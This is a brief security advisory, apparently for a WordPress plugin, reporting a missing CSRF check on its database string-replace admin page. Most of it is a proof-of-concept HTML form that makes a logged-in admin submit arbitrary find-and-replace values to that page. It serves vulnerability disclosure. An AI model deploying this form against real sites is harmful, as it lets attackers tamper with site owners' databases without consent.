The plugin does not have CSRF check when replacing string, which could allow attackers to make a logged admin replace arbitrary string in database tables via a CSRF attack
Make a logged in admin open a page with the below code
<html>
<body>
<form action="http://vulnerable-site.tld/wp-admin/admin.php?page=frasettings" method="POST">
<input type="hidden" name="findstr" value="Str-To-Replace" />
<input type="hidden" name="replacestr" value="Replaced-via-CSRF">
<input type="hidden" name="submit" value="Replace Now" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>